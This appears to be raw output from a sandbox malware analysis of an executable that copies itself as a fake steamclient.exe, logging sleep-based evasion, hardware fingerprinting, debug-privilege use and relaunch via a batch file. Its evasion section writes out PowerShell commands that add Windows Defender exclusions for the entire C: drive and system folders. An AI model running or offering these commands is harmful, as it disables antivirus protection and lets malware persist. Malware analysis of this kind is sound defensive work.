                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8672Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8208Thread sleep count: 1287 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8868Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8736Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8220Thread sleep count: 1076 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8820Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8616Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8280Thread sleep count: 1194 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8836Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8688Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8404Thread sleep count: 1260 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8864Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8540Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8296Thread sleep count: 1716 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8824Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8696Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8400Thread sleep count: 1203 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8844Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8708Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8324Thread sleep count: 1160 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8848Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8640Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8288Thread sleep count: 1136 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8828Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8604Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8336Thread sleep count: 1191 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8860Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8716Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Steam\steamclient.exe TID: 9044Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exe TID: 5788Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Steam\steamclient.exe TID: 4040Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Steam\steamclient.exe TID: 6808Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Steam\steamclient.exe TID: 8356Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exe TID: 3396Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Steam\steamclient.exe TID: 4336Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Steam\steamclient.exe TID: 2024Thread sleep time: -30000s >= -30000s
                    Source: C:\Program Files (x86)\Steam\steamclient.exe TID: 8936Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exe TID: 6372Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Steam\steamclient.exe TID: 1432Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exe TID: 4136Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exe TID: 5776Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exe TID: 6376Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files (x86)\Steam\steamclient.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                    Source: C:\Program Files (x86)\Steam\steamclient.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Program Files (x86)\Steam\steamclient.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                    Source: C:\Program Files (x86)\Steam\steamclient.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files (x86)\Steam\steamclient.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Steam\steamclient.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Steam\steamclient.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Steam\steamclient.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Steam\steamclient.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Steam\steamclient.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Steam\steamclient.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Steam\steamclient.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Program Files (x86)\Steam\steamclient.exeProcess token adjusted: Debug
                    Source: C:\Program Files (x86)\Steam\steamclient.exeProcess token adjusted: Debug
                    Source: C:\Program Files (x86)\Steam\steamclient.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Steam\steamclient.exe'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qNdO4D18CF.exe'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Steam\steamclient.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qNdO4D18CF.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.cmdline"Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Steam\steamclient.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qNdO4D18CF.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XyagYCCOZX.bat" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA90.tmp" "c:\Windows\System32\CSCA9DA535D810450AA35B2C9F27DA16D.TMP"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Steam\steamclient.exe "C:\Program Files (x86)\Steam\steamclient.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Steam\steamclient.exe "C:\Program Files (x86)\Steam\steamclient.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Steam\steamclient.exe "C:\Program Files (x86)\Steam\steamclient.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\qNdO4D18CF.exe C:\Users\user\Desktop\qNdO4D18CF.exe
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeQueries volume information: C:\Users\user\Desktop\qNdO4D18CF.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
